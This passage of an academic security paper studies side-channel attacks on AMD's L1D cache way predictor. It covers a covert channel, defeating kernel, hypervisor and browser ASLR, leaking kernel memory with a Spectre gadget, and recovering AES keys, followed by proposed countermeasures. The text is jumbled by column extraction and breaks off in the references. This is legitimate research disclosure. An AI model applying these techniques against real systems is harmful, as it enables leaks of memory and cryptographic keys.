and er- that are not allowed to communicate with each other. Such a covert ror rate of our covert channel in a local setting and a cloud set- channel can be established by leveraging a side channel. The 휇Tag ting by sending and receiving a randomly generated data blob. We used by AMD’s L1D way prediction enables a covert channel for achieved a maximum transmission rate of 588.9 kB/s (휎푥¯ = 0.544, two processes accessing addresses with the same 휇Tag. 푛 = 1000) using 80 channels in parallel on the AMD Ryzen Thread- For the most simplistic form of the covert channel, two processes ripper 1920X. On the AMD EPYC 7571 in the Amazon EC2 cloud, we agree on a 휇Tag and a cache set (i.e., the least-significant 12 bits of achieved a maximum transmission rate of 544.0 kB/s (휎푥¯ = 0.548, the virtual addresses are the same). This 휇Tag is used for sending 푛 = 1000) also using 80 channels. In contrast, L1 Prime+Probe and receiving data by inducing and measuring cache misses. achieved a transmission rate of 400 kB/s [59] and Flush+Flush a In the initialization phase, both parties allocate their own page. transmission rate of 496 kB/s [30]. As illustrated in Figure 4, the The sender chooses a virtual address 푣푆 , and the receiver chooses mean transmission rate increases with the number of bits sent in a virtual address 푣푅 that fulfills the aforementioned requirements, parallel. However, the error rate increases drastically when trans- i.e., 푣푆 and 푣푅 are in the same cache set and yield the same 휇Tag. mitting more than 64 bits in parallel, as illustrated in Figure 6. As The 휇Tag can simply be computed using the reverse-engineered the number of available different cache sets for our channel is hash function of Section 3. exhausted for our covert channel, sending more bits in parallel ASIA CCS ’20, October 5–9, 2020, Taipei, Taiwan Lipp, et al.

600 Table 2: Evaluation of the ASLR experiments ] s / 400 Target Entropy Bits Reduced Success Rate Timing Source Time kB Linux Kernel 9 7 98.5% thread 0.51 ms (휎 = 12.12 µs) 200 AMD Ryzen Threadripper 1920X TR [ User Process 13 13 88.9% thread 1.94 s (휎 = 1.76 s) AMD EPYC 7751 Virt. Manager 28 16 90.0% rdtsc 2.88 s (휎 = 3.16 s) 0 Virt. Module 18 8 98.9% rdtsc 0.14 s (휎 = 1.74 ms) 0 20 40 60 80 Mozilla Firefox 28 15 98.0% web worker 2.33 s (휎 = 0.03 s) Number of Channels Google Chrome 28 15 86.1% web worker 2.90 s (휎 = 0.25 s) Chrome V8 28 15 100.0% rdtsc 1.14 s (휎 = 0.03 s)

Figure 4: Mean transmission rate of the covert channels using multiple parallel channels on different CPUs. would reuse already used sets. This increases the chance of wrong mapping functions (Section 3.2) to infer bits of the addresses. We measurements and, thus, the error rate. show an additional attack on heap ASLR in Appendix C. Error Correction. As accesses to unrelated addresses with the same 휇Tag as our covert channel introduce noise in our measurements, 5.2.1 Kernel. On modern Linux systems, the position of the kernel an attacker can use error correction to achieve better transmission. text segment is randomized inside the 1 GB area from 0xffff ffff Using hamming codes [33], we introduce 푛 additional parity bits 8000 0000 - 0xffff ffff c000 0000 [39, 46]. As the kernel image allowing us to detect and correct wrongly measured bits of a packet is mapped using 2 MB pages, it can only be mapped in 512 different with a size of 2푛 − 1 bits. For our covert channel, we implemented locations, resulting in 9 bit of entropy [64]. different Hamming codes 퐻 (푚, 푛) that encode 푛 bits by adding Global variables are stored in the .bss and .data sections of 푚 −푛 parity bits. The receiving end of the covert channel computes the kernel image. Since 2 MB physical pages are used, the 21 lower the parity bits from the received data and compares it with the address bits of a global variable are identical to the lower 21 bits received parity bits. Naturally, they only differ if a transmission of the offset within the the kernel image section. Typically, the error occurred. The erroneous bit position can be computed, and kernel image is public and does not differ among users with the the bit error corrected by flipping the bit. This allows to detect up same . With the knowledge of the 휇Tag from the to 2-bit errors and correct one-bit errors for a single transmission. address of a global variable, one can compute the address bits 21 to We evaluated different hamming codes on an AMD Ryzen Thread- 27 using the hash function of AMD’s L1D cache way predictor. ripper 1920X, as illustrated in Figure 7 in Appendix B. When sending To defeat KASLR using Collide+Probe, the attacker needs to data through 60 parallel channels, the 퐻 (7, 4) code reduces the error know the offset of a global variable within the kernel image thatis accessed by the kernel on a user-triggerable event, e.g., a system rate to 0.14 % (휎푥¯ = 0.08, 푛 = 1000), whereas the 퐻 (15, 11) code call or an interrupt. While not many system calls access global achieves an error rate of 0.16 % (휎푥¯ = 0.08, 푛 = 1000). While the 퐻 (7, 4) code is slightly more robust [33], the 퐻 (15, 11) code achieves variables, we found that the SYS_time system call returns the value a better transmission rate of 452.2 kB/s (휎 = 7.79, 푛 = 1000). of the global second counter obj.xtime_sec. Using Collide+Probe, 푥¯ ′ More robust protocols have been used in cache-based covert the attacker accesses an address 푣 with a specific 휇Tag 휇푣′ and channels in the past [48, 53] to achieve error-free communication. schedules the system call, which accesses the global variable with While these techniques can be applied to our covert channel as well, address 푣 and 휇Tag 휇푣. Upon returning from the kernel, the attacker ′ we leave it up to future work. probes the 휇Tag 휇푣′ using address 푣 . On a conflict, the attacker ′ infers that the address 푣 has the same 휇Tag, i.e., 푡 = 휇푣′ = 휇푣. Limitations. As we are not able to observe 휇Tag collisions be- Otherwise, the attacker chooses another address 푣 ′ with a different tween two processes running on sibling threads on one physical 휇Tag 휇푣′ and repeats the process. As the 휇Tag bits 푡0 to 푡7 are known, core, our covert channel is limited to processes running on the same the address bits 푣20 to 푣27 can be computed from address bits 푣12 logical core. to 푣19 based on the way predictor’s hash functions (Section 3.2). Following this approach, we can compute address bits 21 to 27 of 5.2 Breaking ASLR and KASLR the global variable. As we know the offset of the global variable To exploit a memory corruption vulnerability, an attacker often inside the kernel image, we can also recover the start address of the requires knowledge of the location of specific data in memory. kernel image mapping, leaving only bits 28 and 29 unknown. As With address space layout randomization (ASLR), a basic memory the kernel is only randomized once per boot, the reduction to only protection mechanism has been developed that randomizes the 4 address possibilities gives an attacker a significant advantage. locations of memory sections to impede the exploitation of these For the evaluation, we tested 10 different randomization offsets bugs. ASLR is not only applied to user-space applications but also on a Linux 4.15.0-58 kernel with an AMD Ryzen Threadripper 1920X implemented in the kernel (KASLR), randomizing the offsets of processor. We ran our experiment 1000 times for each randomiza- code, data, and modules on every boot. tion offset. With a success rate of 98.5 %, we were able to reduce the In this section, we exploit the relation between virtual addresses entropy of KASLR on average in 0.51 ms (휎 = 12.12 µs, 푛 = 10 000). and 휇Tags to reduce the entropy of ASLR in different scenarios. While there are several microarchitectural KASLR breaks, this With Collide+Probe, we can determine the 휇Tags accessed by the is to the best of our knowledge the first which reportedly works victim, e.g., the kernel or the browser, and use the reverse-engineered on AMD and not only on Intel CPUs. Hund et al. [35] measured Take A Way: Exploring the Security Implications of AMD’s Cache Way Predictors ASIA CCS ’20, October 5–9, 2020, Taipei, Taiwan differences in the runtime of page faults when repeatedly access- is located. As the equation system is very small, an attacker can ing either valid or invalid kernel addresses on Intel CPUs. Bar- trivially solve it in JavaScript. resi et al. [11] exploited page deduplication to break ASLR: a copy- However, to distinguish between colliding and non-colliding ad- on-write pagefault only occurs for the page with the correctly dresses, we require a high-precision timer in JavaScript. While guessed address. Gruss et al. [28] exploited runtime differences in the performance.now() function only returns rounded results the prefetch instruction on Intel CPUs to detect mapped kernel for security reasons [9, 14], we leverage an alternative timing pages. Jang et al. [39] showed that the difference in access time to source [24, 68]. For our evaluation, we used the technique of a count- valid and invalid kernel addresses can be measured when suppress- ing thread constantly incrementing a shared variable [24, 48, 68, 79]. ing exceptions with Intel TSX. Evtyushkin et al. [21] exploited the We tested our proof-of-concept in both the Chrome 76.0.3809 branch-target buffer on Intel CPUs to gain information on mapped and Firefox 68.0.2 web browsers as well as the Chrome V8 stan- pages. Schwarz et al. [64] showed that the store-to-load forwarding dalone engine. In Firefox, we are able to reduce the entropy by logic on Intel CPUs is missing a permission check which allows 15 bits with a success rate of 98 % and an average run time of 2.33 s to detect whether any virtual address is valid. Canella et al. [15] (휎 = 0.03 s, 푛 = 1000). With Chrome, we can correctly reduce the exploited that recent stores can be leaked from the store buffer on bits with a success rate of 86.1 % and an average run time of 2.90 s vulnerable Intel CPUs, allowing to detect valid kernel addresses. (휎 = 0.25 s, 푛 = 1000). As the JavaScript standard does not provide any functionality to retrieve the addresses used by variables, we 5.2.2 Hypervisor. The Kernel-based Virtual Machine (KVM) is a extended the capabilities of the Chrome V8 engine to verify our re- virtualization module that allows the Linux kernel to act as a hyper- sults. We introduced several custom JavaScript functions, including visor to run multiple, isolated environments in parallel called virtual one that returned the virtual address of an array. This provided us machines or guests. Virtual machines can communicate with the with the ground truth to verify that our proof-of-concept recovered hypervisor using hypercalls with the privileged vmcall instruction. the address bits correctly. Inside the extended Chrome V8 engine, In the past, collisions in the branch target buffer (BTB) have been we were able to recover the address bits with a success rate of 100 % used to break hypervisor ASLR [21, 77]. and an average run time of 1.14 s (휎 = 0.03 s, 푛 = 1000). In this scenario, we leak the base address of the KVM kernel module from a guest virtual machine. We issue hypercalls with 5.3 Leaking Kernel Memory invalid call numbers and monitor, which 휇Tags have been accessed In this section, we combine Spectre with Collide+Probe to leak using Collide+Probe. In our evaluation, we identified two cache sets kernel memory without the requirement of shared memory. While enabling us to weaken ASLR of the kvm and the kvm_amd module some Spectre-type attacks use AVX [69] or port contention [13], with a success rate of 98.8 % and an average runtime of 0.14 s (휎 = most attacks use the cache as a covert channel to encode secrets [16, 1.74 ms, 푛 = 1000). We verified our results by comparing the leaked 41]. During transient execution, the kernel caches a user-space ad- address bits with the symbol table (/proc/kallsyms). dress based on a secret. By monitoring the presence of said address Another target is the user-space virtualization manager, e.g., in the cache, the attacker can deduce the leaked value. QEMU. Guest operating systems can interact with virtualization As AMD CPU’s are not vulnerable to Meltdown [49], stronger managers through various methods, e.g., the out instruction. Like- kernel isolation [27] is not enforced on modern operating systems, wise to the previously described hypercall method, a guest virtual leaving the kernel mapped in user space. However, with SMAP machine can use this method to trigger the managing user pro- enabled, the processor never loads an address into the cache if the cess to interact with the guest memory from its own address space. translation triggers a SMAP violation, i.e., the kernel tries to access By using Collide+Probe in this scenario, we were able to reduce a user-space address [6]. Thus, an attacker has to find a vulnerable the ASLR entropy by 16 bits with a success rate of 90.0 % with an indirect branch that can access user-space memory. We lift this average run time of 2.88 s (휎 = 3.16 s, 푛 = 1000). restriction by using Collide+Probe as a cache-based covert channel to infer secret values accessed by the kernel. With Collide+Probe, 5.2.3 JavaScript. In this section, we show that Collide+Probe is we can observe 휇Tag collisions based on the secret value that is not only restricted to native environments. We use Collide+Probe leaked and, thus, remove the requirement of shared memory, i.e., to break ASLR from JavaScript within Chrome and Firefox. As the user memory that is directly accessible to the kernel. JavaScript standard does not define a way to retrieve any address in- To evaluate Collide+Probe as a covert channel for a Spectre- formation, side channels in browsers have been used in the past [57], type attack, we implement a custom kernel module containing a also to break ASLR, simplifying browser exploitation [24, 64]. Spectre-PHT gadget as illustrated as follows: The idea of our ASLR break is similar to the approach of reverse- 1 if (index< bounds){a= LUT[data[index] 4096]; } engineering the way predictor’s mapping function, as described * in Section 3.2. First, we allocate a large chunk of memory as a The execution of the presented code snippet can be triggered JavaScript typed array. If the requested array length is big enough, with an ioctl command that allows the user to control the in- the execution engine allocates it using mmap, placing the array at dex variable as it is passed as an argument. First, we mistrain the the beginning of a memory page [29, 68]. This allows using the by repeatedly providing an index that is in bounds, indices within the array as virtual addresses with an additional letting the processor follow the branch to access a fixed kernel- constant offset. By accessing pairs of addresses, we canfind 휇Tag memory location. Then, we access an address that collides with the collisions allowing us to build an equation system where the only kernel address accessed based on a possible byte-value located at unknown bits are the bits of the address where the start of the array data[index]. By providing an out-of-bounds index, the processor ASIA CCS ’20, October 5–9, 2020, Taipei, Taiwan Lipp, et al.

0x186800 99 94 94 94 93 93 92 92 92 94 95 92 92 92 93 94 0x186800 195 177 181 180 183 180 185 179 170 181 177 176 175 178 173 175 now speculatively accesses a memory location based on the secret 0x186840 93 100 90 91 93 88 93 91 91 90 92 91 88 93 89 91 0x186840 179 197 180 174 180 177 177 177 176 172 166 170 177 183 167 180 0x186880 94 87 100 92 95 97 95 92 89 93 93 92 95 87 90 97 0x186880 179 182 196 176 181 185 180 166 172 177 175 182 188 169 183 171 data located at the out-of-bounds index. Using Collide+Probe, we 0x1868c0 96 93 93 100 94 90 93 92 94 95 90 91 94 92 90 89 0x1868c0 180 182 176 194 178 178 174 167 182 175 182 174 177 174 178 174 0x186900 94 90 92 88 100 90 93 88 94 91 87 96 90 88 90 91 0x186900 184 182 184 177 193 186 180 173 177 176 171 181 182 184 161 172 can now detect if the kernel has accessed the address based on 0x186940 91 90 91 95 89 100 86 91 90 95 93 95 94 93 96 89 0x186940 175 178 174 172 181 196 183 179 182 182 175 176 179 182 172 182 0x186980 94 88 95 95 94 88 100 88 93 89 91 82 90 91 87 91 0x186980 176 181 179 171 178 175 189 164 177 176 172 175 174 164 177 183 the assumed secret byte value. By repeating this step for each of 0x1869c0 93 98 91 88 91 89 94 99 87 85 94 91 96 93 90 92 0x1869c0 175 171 179 172 172 182 173 196 180 174 189 179 182 169 179 175 0x186a00 95 91 89 89 90 93 91 92 100 89 91 92 89 90 92 88 0x186a00 179 177 170 168 180 174 178 179 189 182 178 186 179 179 179 182 Address Address the 256 possible byte values, we can deduce the actual byte as we 0x186a40 95 89 96 90 92 91 96 89 90 100 91 90 91 92 92 88 0x186a40 185 185 169 178 165 177 169 167 174 197 171 177 184 174 171 172 0x186a80 95 94 88 91 95 91 91 92 93 88 100 94 95 93 92 93 0x186a80 176 180 171 169 178 182 178 177 182 183 195 166 172 182 175 178 observe 휇Tag conflicts. As we cannot ensure that the processor 0x186ac0 93 93 94 91 90 93 92 94 92 96 90 100 92 91 90 88 0x186ac0 168 185 179 171 177 173 189 179 190 185 182 195 175 178 186 184 0x186b00 90 95 92 94 90 91 90 90 96 97 92 94 100 91 93 88 0x186b00 171 177 180 173 179 176 174 180 176 184 169 178 195 179 172 169 always misspeculates when providing the out-of-bounds index, we 0x186b40 91 87 91 89 88 93 93 94 87 95 95 91 89 100 87 93 0x186b40 178 187 172 164 171 180 178 180 173 174 183 175 181 196 175 174 0x186b80 96 93 91 90 94 93 94 90 89 97 95 94 92 95 100 97 0x186b80 185 173 179 175 179 182 182 175 178 177 172 170 176 178 185 187 run this attack multiple times for each byte we want to leak. 0x186bc0 88 92 93 96 91 97 89 94 95 84 92 98 91 97 90 100 0x186bc0 179 180 181 180 174 180 179 175 182 181 172 179 181 170 176 186 00 10 20 30 40 50 60 70 80 90 a0 b0 c0 d0 e0 f0 00 10 20 30 40 50 60 70 80 90 a0 b0 c0 d0 e0 f0 We successfully leaked a secret string using Collide+Probe as a Byte value Byte value covert channel on an AMD Ryzen Threadripper 1920X. With our unoptimized version, we are able to leak the secret with a suc- (a) Collide+Probe (b) Load+Reload cess rate of 99.5 % (휎푥¯ = 0.19, 푛 = 100) and a leakage rate of 0.66 B/s = = (휎푥¯ 0.00043, 푛 100). While we leak full byte values in our proof- Figure 5: Cache access pattern with Collide+Probe and Load+ of-concept, other gadgets could allow to leak bit-wise, reducing Reload on the first key byte. the overhead of measuring every possible byte value significantly. In addition, the parameters for the number of mistrainings or the necessary repetitions of the attack to leak a byte can be further tweaked to match the processor under attack. To utilize this side higher number of cache hits than the other parts of the table. We channel, the attacker requires the knowledge of the address of the repeated every experiment 1000 times. With Collide+Probe, we can = kernel-memory that is accessed by the gadget. Thus, on systems successfully recover with a probability of 100 % (휎푥¯ 0) the upper = with active kernel ASLR, the attacker first needs to defeat it. How- 4 bits of each 푘푖 with 168 867 (휎푥¯ 719) encryptions per byte in = = ever, as described in Section 5.2, the attacker can use Collide+Probe 0.07 s (휎푥¯ 0.0003). With Load+Reload, we require 367 731 (휎푥¯ = to derandomize the kernel as well. 82388) encryptions and an average runtime of 0.53 s (휎푥¯ 0.11) to recover 99.0 % (휎푥¯ = 0.0058) of the key bits. Using Prime+Probe on the L1 cache, we can successfully recover 99.7 % (휎푥¯ = 0.01) of the 5.4 Attacking AES T-Tables key bits with 450 406 encryptions (휎푥¯ = 1129) in 1.23 s (휎푥¯ = 0.003). In this section, we show an attack on an AES [19] T-table imple- mentation. While cache attacks have already been demonstrated 6 DISCUSSION against T-table implementations [30, 31, 48, 58, 71] and appropriate While the official documentation of the way prediction feature countermeasures, e.g., bit-sliced implementations [43, 62], have does not explain how it interacts with other processor features, we been presented, they serve as a good example to demonstrate the discuss the interactions with instruction caches, transient execution, applicability of the side channel and allow to compare it against and hypervisors. other existing cache side-channels. Furthermore, AES T-tables are still sometimes used in practice. While some implementations fall Instruction Caches. The patent [22] describes that AMD’s way back to T-table implementations [20] if the AES-NI instruction predictor can be used for both data and instruction cache. However, extension [32] is not available, others only offer T-table-based im- AMD only documents a way predictor for the L1D cache [5] and plementations [45, 55]. For evaluation purposes, we used the T-table not for the L1I cache. implementation of OpenSSL version 1.1.1c. Transient Execution. Speculative execution is a crucial optimiza- In this implementation, the SubBytes, ShiftRows, and MixColumns tion in modern processors. When the CPU encounters a branch, steps of the AES round transformation are replaced by look-ups to instead of waiting for the branch condition, the CPU guesses the 4 pre-computed T-tables 푇0,..., 푇3. As the MixColumns operation outcome and continues the execution in a transient state. If the is omitted in the last round, an additional T-table 푇4 is necessary. speculation was correct, the executed instructions are committed. Each table contains 256 4-byte words, requiring 1 kB of memory. Otherwise, they are discarded. Similarly, CPUs employ out-of-order In our proof-of-concept, we mount the first-round attack by execution to transiently execute instructions ahead of time as soon Osvik et al. [58]. Let 푘푖 denote the initial key bytes, 푝푖 the plaintext as their dependencies are fulfilled. On an exception, the transiently ⊕ bytes and 푥푖 = 푝푖 푘푖 for 푖 = 0,..., 15 the initial state of AES. The executed instructions following the exception are simply discarded, initial state bytes are used to select elements of the pre-computed but leave traces in the microarchitectural state [16]. We investi- T-tables for the following round. An attacker who controls the gated the possibility that AMD Zen processors use the data from plaintext byte 푝푖 and monitors which entries of the T-table are the predicted way without waiting for the physical tag returned by ⊕ accessed can deduce the key byte 푘푖 = 푠푖 푝푖 . However, with a the TLB. However, we were not able to produce any such results. cache-line size of 64 B, it is only possible to derive the upper 4 bit of 푘푖 if the T-tables are properly aligned in memory. With second- Hypervisor. AMD does not document any interactions of the way round and last-round attacks [58, 72] or disaligned T-tables [71], predictor with virtualization. As we have shown in our experiments the key space can be reduced further. (cf. Section 5.2), the way predictor does not distinguish between Figure 5 shows the results of a Collide+Probe and a Load+Reload virtual machines and hypervisors. The way predictor uses the vir- attack on the AMD Ryzen Threadripper 1920X on the first key tual address without any tagging, regardless whether it is a guest byte. As the first key byte is set to zero, the diagonal showsa or host virtual address. Take A Way: Exploring the Security Implications of AMD’s Cache Way Predictors ASIA CCS ’20, October 5–9, 2020, Taipei, Taiwan

7 COUNTERMEASURES data 푛 times, such that the data is accessible via 푛 different virtual In this section, we discuss mitigations to the presented attacks on addresses, which all have a different 휇Tag. When accessing the data, AMD’s way predictor. We first discuss hardware-only mitigations, a random address is chosen out of the 푛 possible addresses. The at- followed by mitigations requiring hardware and software changes, tacker cannot learn which T-table has been accessed by monitoring as well as a software-only solution. the accessed 휇Tags, as a uniform distribution over all possibilities will be observed. This technique is not restricted to T-table imple- Temporarily Disable Way Predictor. One solution lies in designing mentations but can be applied to virtually any secret-dependent the processor in a way that allows temporarily disabling the way memory access within an application. With dynamic software di- predictor temporarily. Alves et al. [10] evaluated the performance versity [18], diversified replicas of program parts are generated impact penalty of instruction replays caused by mispredictions. By automatically to thwart cache-side channel attacks. dynamically disabling way prediction, they observe a higher perfor- mance than with standard way prediction. Dynamically disabling 8 CONCLUSION way prediction can also be used to prevent attacks by disabling it if too many mispredictions within a defined time window are The key takeaway of this paper is that AMD’s cache way predictors detected. If an adversary tries to exploit the way predictor or if leak secret information. To understand the implementation details, the current legitimate workload provokes too many conflicts, the we reverse engineered AMD’s L1D cache way predictor, leading processor deactivates the way predictor and falls back to compar- to two novel side-channel attack techniques. First, Collide+Probe ing the tags from all ways. However, it is unknown whether AMD allows monitoring memory accesses on the current logical core processors support this in hardware, and there is no documented without the knowledge of physical addresses or shared memory. operating system interface to it. Second, Load+Reload obtains accurate memory-access traces of applications co-located on the same physical core. Keyed Hash Function. The currently used mapping functions (Sec- We evaluated our new attack techniques in different scenarios. tion 3) rely solely on bits of the virtual address. This allows an We established a high-speed covert channel and utilized it in a attacker to reverse-engineer the used function once and easily find Spectre attack to leak secret data from the kernel. Furthermore, colliding virtual addresses resulting in the same 휇Tag. By keying the we reduced the entropy of different ASLR implementations from mapping function with an additional process- or context-dependent native code and sandboxed JavaScript. Finally, we recovered a key secret input, a reverse-engineered hash function is only valid for the from a vulnerable AES implementation. attacker process. ScatterCache [76] and CEASAR-S [61] are novel Our attacks demonstrate that AMD’s design is vulnerable to side- cache designs preventing cache attacks by introducing a similar channel attacks. However, we propose countermeasures in software keyed mapping function for skewed-associative caches. Hence, we and hardware, allowing to secure existing implementations and expect that such methods are also effective when used for the way future designs of way predictors. predictor. Moreover, the key can be updated regularly, e.g., when returning from the kernel, and, thus, not remain the same over the ACKNOWLEDGMENTS execution time of the program. We thank our anonymous reviewers for their comments and sugges- State Flushing. With Collide+Probe, an attacker cannot monitor tions that helped improving the paper. The project was supported memory accesses of a victim running on a sibling thread. However, by the Austrian Research Promotion Agency (FFG) via the K-project 휇Tag collisions can still be observed after context switches or tran- DeSSnet, which is funded in the context of COMET - Competence sitions between kernel and user mode. To mitigate Collide+Probe, Centers for Excellent Technologies by BMVIT, BMWFW, Styria, and the state of the way predictor can be cleared when switching to Carinthia. It was also supported by the European Research Coun- another user-space application or returning from the kernel. Ev- cil (ERC) under the European Union’s Horizon 2020 research and ery subsequent memory access yields a misprediction and is thus innovation programme (grant agreement No 681402). This work served from the L2 data cache. This yields the same result as invali- also benefited from the support of the project ANR-19-CE39-0007 dating the L1 data cache, which is currently a required mitigation MIAOUS of the French National Research Agency (ANR). Additional technique against Foreshadow [73] and MDS attacks [15, 67, 74]. funding was provided by generous gifts from Intel. Any opinions, However, we expect it to be more power-efficient than flushing the findings, and conclusions or recommendations expressed in this L1D. To mitigate Spectre attacks [41, 44, 51], it is already neces- paper are those of the authors and do not necessarily reflect the sary to invalidate branch predictors upon context switches [16]. As views of the funding parties. invalidating predictors and the L1D cache on Intel has been imple- mented through CPU microcode updates, introducing an MSR to REFERENCES invalidate the way predictor might be possible on AMD as well. [1] Andreas Abel and Jan Reineke. 2013. Measurement-based Modeling of the Cache Replacement Policy. In Real-Time and Embedded Technology and Applications Uniformly-distributed Collisions. While the previously described Symposium (RTAS). [2] Inc. 2013. BIOS and Kernel Developer’s Guide (BKDG) countermeasures rely on either microcode updates or hardware for AMD Family 15h Models 00h-0Fh Processors. modifications, we also propose an entirely software-based miti- [3] Advanced Micro Devices Inc. 2014. Software Optimization Guide for AMD Family gation. Our attack on an optimized AES T-table implementation 15h Processors. [4] Advanced Micro Devices Inc. 2017. AMD64 Architecture Programmer’s Manual. in Section 5.4 relies on the fact that an attacker can observe the key- [5] Advanced Micro Devices Inc. 2017. Software Optimization Guide for AMD Family dependent look-ups to the T-tables. We propose to map such secret 17h Processors. ASIA CCS ’20, October 5–9, 2020, Taipei, Taiwan Lipp, et al.

[6] Advanced Micro Devices Inc. 2018. Software Techniques for Managing Specula- to AES. In S&P. tion on AMD Processors. Revison 7.10.18. [38] Gorka Irazoqui, Thomas Eisenbarth, and Berk Sunar. 2016. Cross processor cache [7] Advanced Micro Devices Inc. 2019. 2nd Gen AMD EPYC Processors Set New attacks. In AsiaCCS. Standard for the Modern Datacenter with Record-Breaking Performance and [39] Yeongjin Jang, Sangho Lee, and Taesoo Kim. 2016. Breaking Kernel Address Significant TCO Savings. Space Layout Randomization with Intel TSX. In CCS. [8] Alejandro Cabrera Aldaya, Billy Bob Brumley, Sohaib ul Hassan, Cesar Pereida [40] Richard E Kessler. 1999. The alpha 21264 . IEEE Micro (1999). García, and Nicola Tuveri. 2018. Port Contention for Fun and Profit. In S&P. [41] Paul Kocher, Jann Horn, Anders Fogh, Daniel Genkin, Daniel Gruss, Werner Haas, [9] Alex Christensen. 2015. Reduce resolution of performance.now. https://bugs. Mike Hamburg, Moritz Lipp, Stefan Mangard, Thomas Prescher, Michael Schwarz, webkit.org/show_bug.cgi?id=146531 and Yuval Yarom. 2019. Spectre Attacks: Exploiting Speculative Execution. In [10] Ricardo Alves, Stefanos Kaxiras, and David Black-Schaffer. 2018. Dynamically S&P. disabling way-prediction to reduce instruction replay. In International Conference [42] Paul C. Kocher. 1996. Timing Attacks on Implementations of Diffe-Hellman, RSA, on Computer Design (ICCD). DSS, and Other Systems. In CRYPTO. [11] Antonio Barresi, Kaveh Razavi, Mathias Payer, and Thomas R. Gross. 2015. CAIN: [43] Robert Könighofer. 2008. A Fast and Cache-Timing Resistant Implementation of Silently Breaking ASLR in the Cloud. In WOOT. the AES. In CT-RSA. [12] Daniel J. Bernstein. 2005. Cache-Timing Attacks on AES. http://cr.yp.to/ [44] Esmaeil Mohammadian Koruyeh, Khaled Khasawneh, Chengyu Song, and Nael antiforgery/cachetiming-20050414.pdf Abu-Ghazaleh. 2018. Spectre Returns! Speculation Attacks using the Return [13] Atri Bhattacharyya, Alexandra Sandulescu, Matthias Neugschwandt ner, Alessan- Stack Buffer. In WOOT. dro Sorniotti, Babak Falsafi, Mathias Payer, and Anil Kurmus. 2019. SMoTher- [45] Marcin Krzyzanowski. 2019. CryptoSwift: Growing collection of standard and Spectre: exploiting speculative execution through port contention. In CCS. secure cryptographic algorithms implemented in Swift. https://cryptoswift.io [14] Boris Zbarsky. 2015. Reduce resolution of performance.now. https://hg.mozilla. [46] Linux. 2019. Complete virtual memory map with 4-level page tables. https: org/integration/mozilla-inbound/rev/48ae8b5e62ab //www.kernel.org/doc/Documentation/x86/x86_64/mm.txt [15] Claudio Canella, Daniel Genkin, Lukas Giner, Daniel Gruss, Moritz Lipp, Ma- [47] Linux. 2019. Linux Kernel 5.0 Process (). https://git.kernel.org/pub/scm/ rina Minkin, Daniel Moghimi, Frank Piessens, Michael Schwarz, Berk Sunar, Jo linux/kernel/git/torvalds/linux.git/tree/arch/x86/kernel/process.c Van Bulck, and Yuval Yarom. 2019. Fallout: Leaking Data on Meltdown-resistant [48] Moritz Lipp, Daniel Gruss, Raphael Spreitzer, Clémentine Maurice, and Stefan CPUs. In CCS. Mangard. 2016. ARMageddon: Cache Attacks on Mobile Devices. In USENIX [16] Claudio Canella, Jo Van Bulck, Michael Schwarz, Moritz Lipp, Benjamin von Berg, Security Symposium. Philipp Ortner, Frank Piessens, Dmitry Evtyushkin, and Daniel Gruss. 2019. A Sys- [49] Moritz Lipp, Michael Schwarz, Daniel Gruss, Thomas Prescher, Werner Haas, tematic Evaluation of Transient Execution Attacks and Defenses. In USENIX Se- Anders Fogh, Jann Horn, Stefan Mangard, Paul Kocher, Daniel Genkin, Yuval curity Symposium. Extended classification tree and PoCs at https://transient.fail/. Yarom, and Mike Hamburg. 2018. Meltdown: Reading Kernel Memory from User [17] Mike Clark. 2016. A new x86 core architecture for the next generation of com- Space. In USENIX Security Symposium. puting. In IEEE Hot Chips Symposium (HCS). [50] Fangfei Liu, Yuval Yarom, Qian Ge, Gernot Heiser, and Ruby B. Lee. 2015. Last- [18] Stephen Crane, Andrei Homescu, Stefan Brunthaler, Per Larsen, and Michael Level Cache Side-Channel Attacks are Practical. In S&P. Franz. 2015. Thwarting Cache Side-Channel Attacks Through Dynamic Software [51] G. Maisuradze and C. Rossow. 2018. ret2spec: Speculative Execution Using Return Diversity. In NDSS. Stack Buffers. In CCS. [19] Joan Daemen and Vincent Rijmen. 2013. The design of Rijndael: AES-the advanced [52] Clémentine Maurice, Nicolas Le Scouarnec, Christoph Neumann, Olivier Heen, encryption standard. and Aurélien Francillon. 2015. Reverse Engineering Intel Complex Addressing [20] Helder Eijs. 2018. PyCryptodome: A self-contained cryptographic library for Using Performance Counters. In RAID. Python. https://www.pycryptodome.org [53] Clémentine Maurice, Manuel Weber, Michael Schwarz, Lukas Giner, Daniel Gruss, [21] Dmitry Evtyushkin, Dmitry Ponomarev, and Nael Abu-Ghazaleh. 2016. Jump Carlo Alberto Boano, Stefan Mangard, and Kay Römer. 2017. Hello from the over ASLR: Attacking branch predictors to bypass ASLR. In MICRO. Other Side: SSH over Robust Cache Covert Channels in the Cloud. In NDSS. [22] W. Shen Gene and S. Craig Nelson. 2006. MicroTLB and micro tag for reducing [54] Ahmad Moghimi, Gorka Irazoqui, and Thomas Eisenbarth. 2017. Cachezoom: power in a processor . US Patent 7,117,290 B2. How SGX amplifies the power of cache attacks. In CHES. [23] Ben Gras, Kaveh Razavi, Herbert Bos, and Cristiano Giuffrida. 2018. Translation [55] Richard Moore. 2017. pyaes: Pure-Python implementation of AES block-cipher Leak-aside Buffer: Defeating Cache Side-channel Protections with TLB Attacks. and common modes of operation. https://github.com/ricmoo/pyaes In USENIX Security Symposium. [56] Louis-Marie Vincent Mouton, Nicolas Jean Phillippe Huot, Gilles Eric Grandou, [24] Ben Gras, Kaveh Razavi, Erik Bosman, Herbert Bos, and Cristiano Giuffrida. 2017. and Stephane Eric Sebastian Brochier. 2012. Cache accessing using a micro TAG. ASLR on the Line: Practical Cache Attacks on the MMU. In NDSS. US Patent 8,151,055. [25] Leon Groot Bruinderink, Andreas Hülsing, Tanja Lange, and Yuval Yarom. 2016. [57] Yossef Oren, Vasileios P Kemerlis, Simha Sethumadhavan, and Angelos D Flush, Gauss, and Reload – A Cache Attack on the BLISS Lattice-Based Signature Keromytis. 2015. The Spy in the Sandbox: Practical Cache Attacks in JavaScript Scheme. In CHES. and their Implications. In CCS. [26] William Gropp, Ewing Lusk, Nathan Doss, and Anthony Skjellum. 1996. A high- [58] Dag Arne Osvik, Adi Shamir, and Eran Tromer. 2006. Cache Attacks and Coun- performance, portable implementation of the MPI message passing interface termeasures: the Case of AES. In CT-RSA. standard. Parallel computing (1996). [59] Colin Percival. 2005. Cache missing for fun and profit. In BSDCan. [27] Daniel Gruss, Moritz Lipp, Michael Schwarz, Richard Fellner, Clémentine Maurice, [60] Peter Pessl, 